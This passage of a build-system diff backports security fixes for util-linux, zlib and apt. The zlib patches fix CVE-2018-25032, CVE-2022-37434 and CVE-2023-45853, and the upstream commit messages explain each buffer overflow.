74+ return -EINVAL;
75+ *num = (uint64_t) strtoumax(str, &end, base);
76+
77+ if (errno || str == end || (end && *end))
78+ return -EINVAL;
79+ return 0;
80 }
81
82-static uint16_t _strtou16_or_err(const char *str, const char *errmesg, int base)
83+/*
84+ * Covert strings to numbers and print message on error.
85+ *
86+ * Note that hex functions (strtox..()) returns unsigned numbers, if you need
87+ * something else then use ul_strtos64(s, &n, 16).
88+ */
89+int64_t strtos64_or_err(const char *str, const char *errmesg)
90 {
91- uint32_t num = _strtou32_or_err(str, errmesg, base);
92+ int64_t num = 0;
93
94- if (num > UINT16_MAX) {
95- errno = ERANGE;
96- err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
97+ if (ul_strtos64(str, &num, 10) != 0) {
98+ if (errno == ERANGE)
99+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
100+
101+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
102 }
103 return num;
104 }
105
106-uint16_t strtou16_or_err(const char *str, const char *errmesg)
107+uint64_t strtou64_or_err(const char *str, const char *errmesg)
108 {
109- return _strtou16_or_err(str, errmesg, 10);
110+ uint64_t num = 0;
111+
112+ if (ul_strtou64(str, &num, 10)) {
113+ if (errno == ERANGE)
114+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
115+
116+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
117+ }
118+ return num;
119 }
120
121-uint16_t strtox16_or_err(const char *str, const char *errmesg)
122+uint64_t strtox64_or_err(const char *str, const char *errmesg)
123 {
124- return _strtou16_or_err(str, errmesg, 16);
125+ uint64_t num = 0;
126+
127+ if (ul_strtou64(str, &num, 16)) {
128+ if (errno == ERANGE)
129+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
130+
131+ errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
132+ }
133+ return num;
134 }
135
136 int32_t strtos32_or_err(const char *str, const char *errmesg)
137@@ -365,9 +406,9 @@ int32_t strtos32_or_err(const char *str, const char *errmesg)
138 return num;
139 }
140
141-static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
142+uint32_t strtou32_or_err(const char *str, const char *errmesg)
143 {
144- uint64_t num = _strtou64_or_err(str, errmesg, base);
145+ uint64_t num = strtou64_or_err(str, errmesg);
146
147 if (num > UINT32_MAX) {
148 errno = ERANGE;
149@@ -376,66 +417,48 @@ static uint32_t _strtou32_or_err(const char *str, const char *errmesg, int base)
150 return num;
151 }
152
153-uint32_t strtou32_or_err(const char *str, const char *errmesg)
154-{
155- return _strtou32_or_err(str, errmesg, 10);
156-}
157-
158 uint32_t strtox32_or_err(const char *str, const char *errmesg)
159 {
160- return _strtou32_or_err(str, errmesg, 16);
161+ uint64_t num = strtox64_or_err(str, errmesg);
162+
163+ if (num > UINT32_MAX) {
164+ errno = ERANGE;
165+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
166+ }
167+ return num;
168 }
169
170-int64_t strtos64_or_err(const char *str, const char *errmesg)
171+int16_t strtos16_or_err(const char *str, const char *errmesg)
172 {
173- int64_t num;
174- char *end = NULL;
175-
176- errno = 0;
177- if (str == NULL || *str == '\0')
178- goto err;
179- num = strtoimax(str, &end, 10);
180-
181- if (errno || str == end || (end && *end))
182- goto err;
183+ int64_t num = strtos64_or_err(str, errmesg);
184
185- return num;
186-err:
187- if (errno == ERANGE)
188+ if (num < INT16_MIN || num > INT16_MAX) {
189+ errno = ERANGE;
190 err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
191-
192- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
193+ }
194+ return num;
195 }
196
197-static uint64_t _strtou64_or_err(const char *str, const char *errmesg, int base)
198+uint16_t strtou16_or_err(const char *str, const char *errmesg)
199 {
200- uintmax_t num;
201- char *end = NULL;
202-
203- errno = 0;
204- if (str == NULL || *str == '\0')
205- goto err;
206- num = strtoumax(str, &end, base);
207-
208- if (errno || str == end || (end && *end))
209- goto err;
210+ uint64_t num = strtou64_or_err(str, errmesg);
211
212- return num;
213-err:
214- if (errno == ERANGE)
215+ if (num > UINT16_MAX) {
216+ errno = ERANGE;
217 err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
218-
219- errx(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
220+ }
221+ return num;
222 }
223
224-uint64_t strtou64_or_err(const char *str, const char *errmesg)
225+uint16_t strtox16_or_err(const char *str, const char *errmesg)
226 {
227- return _strtou64_or_err(str, errmesg, 10);
228-}
229+ uint64_t num = strtox64_or_err(str, errmesg);
230
231-uint64_t strtox64_or_err(const char *str, const char *errmesg)
232-{
233- return _strtou64_or_err(str, errmesg, 16);
234+ if (num > UINT16_MAX) {
235+ errno = ERANGE;
236+ err(STRTOXX_EXIT_CODE, "%s: '%s'", errmesg, str);
237+ }
238+ return num;
239 }
240
241 double strtod_or_err(const char *str, const char *errmesg)
242@@ -1051,15 +1051,25 @@ static int test_strutils_cmp_paths(int a
243
244 int main(int argc, char *argv[])
245 {
246- if (argc == 3 && strcmp(argv[1], "--size") == 0)
247+ if (argc == 3 && strcmp(argv[1], "--size") == 0) {
248 return test_strutils_sizes(argc - 1, argv + 1);
249
250- else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0)
251+ } else if (argc == 4 && strcmp(argv[1], "--cmp-paths") == 0) {
252 return test_strutils_cmp_paths(argc - 1, argv + 1);
253
254+ } else if (argc == 3 && strcmp(argv[1], "--str2num") == 0) {
255+ uint64_t n;
256+
257+ if (ul_strtou64(argv[2], &n, 10) == 0) {
258+ printf("'%s' --> %ju\n", argv[2], (uintmax_t) n);
259+ return EXIT_SUCCESS;
260+ }
261+ }
262+
263 else {
264 fprintf(stderr, "usage: %1$s --size <number>[suffix]\n"
265- " %1$s --cmp-paths <path> <path>\n",
266+ " %1$s --cmp-paths <path> <path>\n"
267+ " %1$s --num2num <str>\n",
268 argv[0]);
269 exit(EXIT_FAILURE);
270 }
diff --git a/meta/recipes-core/util-linux/util-linux_2.35.1.bb b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
index 516b783887..89dc564ecb 100644
--- a/meta/recipes-core/util-linux/util-linux_2.35.1.bb
+++ b/meta/recipes-core/util-linux/util-linux_2.35.1.bb
@@ -11,6 +11,11 @@ SRC_URI += "file://configure-sbindir.patch \
11 file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \ 11 file://0001-libfdisk-script-accept-sector-size-ignore-unknown-he.patch \
12 file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \ 12 file://0001-kill-include-sys-types.h-before-checking-SYS_pidfd_s.patch \
13 file://0001-include-cleanup-pidfd-inckudes.patch \ 13 file://0001-include-cleanup-pidfd-inckudes.patch \
14 file://CVE-2021-37600.patch \
15 file://include-strutils-cleanup-strto-functions.patch \
16 file://CVE-2021-3995.patch \
17 file://CVE-2021-3996.patch \
18 file://CVE-2022-0563.patch \
14" 19"
15SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf" 20SRC_URI[md5sum] = "7f64882f631225f0295ca05080cee1bf"
16SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9" 21SRC_URI[sha256sum] = "d9de3edd287366cd908e77677514b9387b22bc7b88f45b83e1922c3597f1d7f9"
diff --git a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
index b23355a714..4b34ebd12d 100644
--- a/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
+++ b/meta/recipes-core/volatile-binds/files/volatile-binds.service.in
@@ -1,6 +1,6 @@
1[Unit] 1[Unit]
2Description=Bind mount volatile @where@ 2Description=Bind mount volatile @where@
3DefaultDependencies=false 3DefaultDependencies=no
4Before=local-fs.target 4Before=local-fs.target
5RequiresMountsFor=@whatparent@ @whereparent@ 5RequiresMountsFor=@whatparent@ @whereparent@
6ConditionPathIsReadWrite=@whatparent@ 6ConditionPathIsReadWrite=@whatparent@
diff --git a/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
new file mode 100644
index 0000000000..5cb6183641
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2018-25032.patch
@@ -0,0 +1,347 @@
1CVE: CVE-2018-25032
2Upstream-Status: Backport
3Signed-off-by: Ross Burton <ross.burton@arm.com>
4
5From 5c44459c3b28a9bd3283aaceab7c615f8020c531 Mon Sep 17 00:00:00 2001
6From: Mark Adler <madler@alumni.caltech.edu>
7Date: Tue, 17 Apr 2018 22:09:22 -0700
8Subject: [PATCH] Fix a bug that can crash deflate on some input when using
9 Z_FIXED.
10
11This bug was reported by Danilo Ramos of Eideticom, Inc. It has
12lain in wait 13 years before being found! The bug was introduced
13in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
14option forces the use of fixed Huffman codes. For rare inputs with
15a large number of distant matches, the pending buffer into which
16the compressed data is written can overwrite the distance symbol
17table which it overlays. That results in corrupted output due to
18invalid distances, and can result in out-of-bound accesses,
19crashing the application.
20
21The fix here combines the distance buffer and literal/length
22buffers into a single symbol buffer. Now three bytes of pending
23buffer space are opened up for each literal or length/distance
24pair consumed, instead of the previous two bytes. This assures
25that the pending buffer cannot overwrite the symbol table, since
26the maximum fixed code compressed length/distance is 31 bits, and
27since there are four bytes of pending space for every three bytes
28of symbol space.
29---
30 deflate.c | 74 ++++++++++++++++++++++++++++++++++++++++---------------
31 deflate.h | 25 +++++++++----------
32 trees.c | 50 +++++++++++--------------------------
33 3 files changed, 79 insertions(+), 70 deletions(-)
34
35diff --git a/deflate.c b/deflate.c
36index 425babc00..19cba873a 100644
37--- a/deflate.c
38+++ b/deflate.c
39@@ -255,11 +255,6 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
40 int wrap = 1;
41 static const char my_version[] = ZLIB_VERSION;
42
43- ushf *overlay;
44- /* We overlay pending_buf and d_buf+l_buf. This works since the average
45- * output size for (length,distance) codes is <= 24 bits.
46- */
47-
48 if (version == Z_NULL || version[0] != my_version[0] ||
49 stream_size != sizeof(z_stream)) {
50 return Z_VERSION_ERROR;
51@@ -329,9 +324,47 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
52
53 s->lit_bufsize = 1 << (memLevel + 6); /* 16K elements by default */
54
55- overlay = (ushf *) ZALLOC(strm, s->lit_bufsize, sizeof(ush)+2);
56- s->pending_buf = (uchf *) overlay;
57- s->pending_buf_size = (ulg)s->lit_bufsize * (sizeof(ush)+2L);
58+ /* We overlay pending_buf and sym_buf. This works since the average size
59+ * for length/distance pairs over any compressed block is assured to be 31
60+ * bits or less.
61+ *
62+ * Analysis: The longest fixed codes are a length code of 8 bits plus 5
63+ * extra bits, for lengths 131 to 257. The longest fixed distance codes are
64+ * 5 bits plus 13 extra bits, for distances 16385 to 32768. The longest
65+ * possible fixed-codes length/distance pair is then 31 bits total.
66+ *
67+ * sym_buf starts one-fourth of the way into pending_buf. So there are
68+ * three bytes in sym_buf for every four bytes in pending_buf. Each symbol
69+ * in sym_buf is three bytes -- two for the distance and one for the
70+ * literal/length. As each symbol is consumed, the pointer to the next
71+ * sym_buf value to read moves forward three bytes. From that symbol, up to
72+ * 31 bits are written to pending_buf. The closest the written pending_buf
73+ * bits gets to the next sym_buf symbol to read is just before the last
74+ * code is written. At that time, 31*(n-2) bits have been written, just
75+ * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
76+ * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
77+ * symbols are written.) The closest the writing gets to what is unread is
78+ * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
79+ * can range from 128 to 32768.
80+ *
81+ * Therefore, at a minimum, there are 142 bits of space between what is
82+ * written and what is read in the overlain buffers, so the symbols cannot
83+ * be overwritten by the compressed data. That space is actually 139 bits,
84+ * due to the three-bit fixed-code block header.
85+ *
86+ * That covers the case where either Z_FIXED is specified, forcing fixed
87+ * codes, or when the use of fixed codes is chosen, because that choice
88+ * results in a smaller compressed block than dynamic codes. That latter
89+ * condition then assures that the above analysis also covers all dynamic
90+ * blocks. A dynamic-code block will only be chosen to be emitted if it has
91+ * fewer bits than a fixed-code block would for the same set of symbols.
92+ * Therefore its average symbol length is assured to be less than 31. So
93+ * the compressed data for a dynamic block also cannot overwrite the
94+ * symbols from which it is being constructed.
95+ */
96+
97+ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
98+ s->pending_buf_size = (ulg)s->lit_bufsize * 4;
99
100 if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
101 s->pending_buf == Z_NULL) {
102@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
103 deflateEnd (strm);
104 return Z_MEM_ERROR;
105 }
106- s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
107- s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
108+ s->sym_buf = s->pending_buf + s->lit_bufsize;
109+ s->sym_end = (s->lit_bufsize - 1) * 3;
110+ /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
111+ * on 16 bit machines and because stored blocks are restricted to
112+ * 64K-1 bytes.
113+ */
114
115 s->level = level;
116 s->strategy = strategy;
117@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
118
119 if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
120 s = strm->state;
121- if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
122+ if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
123 return Z_BUF_ERROR;
124 do {
125 put = Buf_size - s->bi_valid;
126@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
127 #else
128 deflate_state *ds;
129 deflate_state *ss;
130- ushf *overlay;
131
132
133 if (deflateStateCheck(source) || dest == Z_NULL) {
134@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
135 ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
136 ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos));
137 ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos));
138- overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
139- ds->pending_buf = (uchf *) overlay;
140+ ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
141
142 if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
143 ds->pending_buf == Z_NULL) {
144@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
145 zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
146
147 ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
148- ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
149- ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
150+ ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
151
152 ds->l_desc.dyn_tree = ds->dyn_ltree;
153 ds->d_desc.dyn_tree = ds->dyn_dtree;
154@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
155 FLUSH_BLOCK(s, 1);
156 return finish_done;
157 }
158- if (s->last_lit)
159+ if (s->sym_next)
160 FLUSH_BLOCK(s, 0);
161 return block_done;
162 }
163@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
164 FLUSH_BLOCK(s, 1);
165 return finish_done;
166 }
167- if (s->last_lit)
168+ if (s->sym_next)
169 FLUSH_BLOCK(s, 0);
170 return block_done;
171 }
172@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
173 FLUSH_BLOCK(s, 1);
174 return finish_done;
175 }
176- if (s->last_lit)
177+ if (s->sym_next)
178 FLUSH_BLOCK(s, 0);
179 return block_done;
180 }
181@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
182 FLUSH_BLOCK(s, 1);
183 return finish_done;
184 }
185- if (s->last_lit)
186+ if (s->sym_next)
187 FLUSH_BLOCK(s, 0);
188 return block_done;
189 }
190diff --git a/deflate.h b/deflate.h
191index 23ecdd312..d4cf1a98b 100644
192--- a/deflate.h
193+++ b/deflate.h
194@@ -217,7 +217,7 @@ typedef struct internal_state {
195 /* Depth of each subtree used as tie breaker for trees of equal frequency
196 */
197
198- uchf *l_buf; /* buffer for literals or lengths */
199+ uchf *sym_buf; /* buffer for distances and literals/lengths */
200
201 uInt lit_bufsize;
202 /* Size of match buffer for literals/lengths. There are 4 reasons for
203@@ -239,13 +239,8 @@ typedef struct internal_state {
204 * - I can't count above 4
205 */
206
207- uInt last_lit; /* running index in l_buf */
208-
209- ushf *d_buf;
210- /* Buffer for distances. To simplify the code, d_buf and l_buf have
211- * the same number of elements. To use different lengths, an extra flag
212- * array would be necessary.
213- */
214+ uInt sym_next; /* running index in sym_buf */
215+ uInt sym_end; /* symbol table full when sym_next reaches this */
216
217 ulg opt_len; /* bit length of current block with optimal trees */
218 ulg static_len; /* bit length of current block with static trees */
219@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
220
221 # define _tr_tally_lit(s, c, flush) \
222 { uch cc = (c); \
223- s->d_buf[s->last_lit] = 0; \
224- s->l_buf[s->last_lit++] = cc; \
225+ s->sym_buf[s->sym_next++] = 0; \
226+ s->sym_buf[s->sym_next++] = 0; \
227+ s->sym_buf[s->sym_next++] = cc; \
228 s->dyn_ltree[cc].Freq++; \
229- flush = (s->last_lit == s->lit_bufsize-1); \
230+ flush = (s->sym_next == s->sym_end); \
231 }
232 # define _tr_tally_dist(s, distance, length, flush) \
233 { uch len = (uch)(length); \
234 ush dist = (ush)(distance); \
235- s->d_buf[s->last_lit] = dist; \
236- s->l_buf[s->last_lit++] = len; \
237+ s->sym_buf[s->sym_next++] = dist; \
238+ s->sym_buf[s->sym_next++] = dist >> 8; \
239+ s->sym_buf[s->sym_next++] = len; \
240 dist--; \
241 s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
242 s->dyn_dtree[d_code(dist)].Freq++; \
243- flush = (s->last_lit == s->lit_bufsize-1); \
244+ flush = (s->sym_next == s->sym_end); \
245 }
246 #else
247 # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
248diff --git a/trees.c b/trees.c
249index 4f4a65011..decaeb7c3 100644
250--- a/trees.c
251+++ b/trees.c
252@@ -416,7 +416,7 @@ local void init_block(s)
253
254 s->dyn_ltree[END_BLOCK].Freq = 1;
255 s->opt_len = s->static_len = 0L;
256- s->last_lit = s->matches = 0;
257+ s->sym_next = s->matches = 0;
258 }
259
260 #define SMALLEST 1
261@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
262
263 Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
264 opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
265- s->last_lit));
266+ s->sym_next / 3));
267
268 if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
269
270@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
271 unsigned dist; /* distance of matched string */
272 unsigned lc; /* match length-MIN_MATCH or unmatched char (if dist==0) */
273 {
274- s->d_buf[s->last_lit] = (ush)dist;
275- s->l_buf[s->last_lit++] = (uch)lc;
276+ s->sym_buf[s->sym_next++] = dist;
277+ s->sym_buf[s->sym_next++] = dist >> 8;
278+ s->sym_buf[s->sym_next++] = lc;
279 if (dist == 0) {
280 /* lc is the unmatched char */
281 s->dyn_ltree[lc].Freq++;
282@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
283 s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
284 s->dyn_dtree[d_code(dist)].Freq++;
285 }
286-
287-#ifdef TRUNCATE_BLOCK
288- /* Try to guess if it is profitable to stop the current block here */
289- if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
290- /* Compute an upper bound for the compressed length */
291- ulg out_length = (ulg)s->last_lit*8L;
292- ulg in_length = (ulg)((long)s->strstart - s->block_start);
293- int dcode;
294- for (dcode = 0; dcode < D_CODES; dcode++) {
295- out_length += (ulg)s->dyn_dtree[dcode].Freq *
296- (5L+extra_dbits[dcode]);
297- }
298- out_length >>= 3;
299- Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
300- s->last_lit, in_length, out_length,
301- 100L - out_length*100L/in_length));
302- if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
303- }
304-#endif
305- return (s->last_lit == s->lit_bufsize-1);
306- /* We avoid equality with lit_bufsize because of wraparound at 64K
307- * on 16 bit machines and because stored blocks are restricted to
308- * 64K-1 bytes.
309- */
310+ return (s->sym_next == s->sym_end);
311 }
312
313 /* ===========================================================================
314@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
315 {
316 unsigned dist; /* distance of matched string */
317 int lc; /* match length or unmatched char (if dist == 0) */
318- unsigned lx = 0; /* running index in l_buf */
319+ unsigned sx = 0; /* running index in sym_buf */
320 unsigned code; /* the code to send */
321 int extra; /* number of extra bits to send */
322
323- if (s->last_lit != 0) do {
324- dist = s->d_buf[lx];
325- lc = s->l_buf[lx++];
326+ if (s->sym_next != 0) do {
327+ dist = s->sym_buf[sx++] & 0xff;
328+ dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
329+ lc = s->sym_buf[sx++];
330 if (dist == 0) {
331 send_code(s, lc, ltree); /* send a literal byte */
332 Tracecv(isgraph(lc), (stderr," '%c' ", lc));
333@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
334 }
335 } /* literal or match pair ? */
336
337- /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
338- Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
339- "pendingBuf overflow");
340+ /* Check that the overlay between pending_buf and sym_buf is ok: */
341+ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
342
343- } while (lx < s->last_lit);
344+ } while (sx < s->sym_next);
345
346 send_code(s, END_BLOCK, ltree);
347 }
diff --git a/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
new file mode 100644
index 0000000000..d29e6e0f1f
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
1From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Wed, 17 Aug 2022 10:15:57 +0530
4Subject: [PATCH] CVE-2022-37434
5
6Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
7CVE: CVE-2022-37434
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10Fix a bug when getting a gzip header extra field with inflate().
11
12If the extra field was larger than the space the user provided with
13inflateGetHeader(), and if multiple calls of inflate() delivered
14the extra header data, then there could be a buffer overflow of the
15provided space. This commit assures that provided space is not
16exceeded.
17
18 Fix extra field processing bug that dereferences NULL state->head.
19
20The recent commit to fix a gzip header extra field processing bug
21introduced the new bug fixed here.
22---
23 inflate.c | 5 +++--
24 1 file changed, 3 insertions(+), 2 deletions(-)
25
26diff --git a/inflate.c b/inflate.c
27index ac333e8..cd01857 100644
28--- a/inflate.c
29+++ b/inflate.c
30@@ -759,8 +759,9 @@ int flush;
31 if (copy > have) copy = have;
32 if (copy) {
33 if (state->head != Z_NULL &&
34- state->head->extra != Z_NULL) {
35- len = state->head->extra_len - state->length;
36+ state->head->extra != Z_NULL &&
37+ (len = state->head->extra_len - state->length) <
38+ state->head->extra_max) {
39 zmemcpy(state->head->extra + len, next,
40 len + copy > state->head->extra_max ?
41 state->head->extra_max - len : copy);
42--
432.25.1
44
diff --git a/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
new file mode 100644
index 0000000000..654579eb81
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
1From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
2From: Hans Wennborg <hans@chromium.org>
3Date: Fri, 18 Aug 2023 11:05:33 +0200
4Subject: [PATCH] Reject overflows of zip header fields in minizip.
5
6This checks the lengths of the file name, extra field, and comment
7that would be put in the zip headers, and rejects them if they are
8too long. They are each limited to 65535 bytes in length by the zip
9format. This also avoids possible buffer overflows if the provided
10fields are too long.
11
12Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
13CVE: CVE-2023-45853
14Signed-off-by: Ashish Sharma <asharma@mvista.com>
15---
16 contrib/minizip/zip.c | 11 +++++++++++
17 1 file changed, 11 insertions(+)
18
19diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
20index 3d3d4cadd..0446109b2 100644
21--- a/contrib/minizip/zip.c
22+++ b/contrib/minizip/zip.c
23@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
24 return ZIP_PARAMERROR;
25 #endif
26
27+ // The filename and comment length must fit in 16 bits.
28+ if ((filename!=NULL) && (strlen(filename)>0xffff))
29+ return ZIP_PARAMERROR;
30+ if ((comment!=NULL) && (strlen(comment)>0xffff))
31+ return ZIP_PARAMERROR;
32+ // The extra field length must fit in 16 bits. If the member also requires
33+ // a Zip64 extra block, that will also need to fit within that 16-bit
34+ // length, but that will be checked for later.
35+ if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
36+ return ZIP_PARAMERROR;
37+
38 zi = (zip64_internal*)file;
39
40 if (zi->in_opened_file_inzip == 1)
diff --git a/meta/recipes-core/zlib/zlib_1.2.11.bb b/meta/recipes-core/zlib/zlib_1.2.11.bb
index ef9431ae47..9355f0556e 100644
--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
8 8
9SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \ 9SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
10 file://ldflags-tests.patch \ 10 file://ldflags-tests.patch \
11 file://CVE-2018-25032.patch \
11 file://run-ptest \ 12 file://run-ptest \
13 file://CVE-2022-37434.patch \
14 file://CVE-2023-45853.patch \
12 " 15 "
13UPSTREAM_CHECK_URI = "http://zlib.net/" 16UPSTREAM_CHECK_URI = "http://zlib.net/"
14 17
@@ -50,3 +53,6 @@ do_install_append_class-target() {
50} 53}
51 54
52BBCLASSEXTEND = "native nativesdk" 55BBCLASSEXTEND = "native nativesdk"
56
57# this CVE is for cloudflare zlib
58CVE_CHECK_WHITELIST += "CVE-2023-6992"
diff --git a/meta/recipes-devtools/apt/apt.inc b/meta/recipes-devtools/apt/apt.inc
index 13f5969f86..251795eeca 100644
--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
2DESCRIPTION = "Provides command-line tools for searching and managing as well \ 2DESCRIPTION = "Provides command-line tools for searching and managing as well \
3as querying information about packages as a low-level access to all features \ 3as querying information about packages as a low-level access to all features \
4of the libapt-pkg library." 4of the libapt-pkg library."
5HOMEPAGE = "https://packages.debian.org/jessie/apt"
5LICENSE = "GPLv2.0+" 6LICENSE = "GPLv2.0+"
6SECTION = "base" 7SECTION = "base"
7 8
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
17 file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \ 18 file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
18 file://0001-apt-1.2.12-Fix-musl-build.patch \ 19 file://0001-apt-1.2.12-Fix-musl-build.patch \
19 file://0001-Include-array.h-for-std-array.patch \ 20 file://0001-Include-array.h-for-std-array.patch \
21 file://CVE-2020-3810.patch \
20 " 22 "
21SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9" 23SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
22SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059" 24SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
35 rm -rf ${S}/buildlib/config.guess 37 rm -rf ${S}/buildlib/config.guess
36} 38}
37 39
40# there are code generation issues with some compilers in the SHA256 implementation
41# turn off strict-aliasing to avoid these issues
42CXXFLAGS:append = " -fno-strict-aliasing"
43
38USERADD_PACKAGES = "${PN}" 44USERADD_PACKAGES = "${PN}"
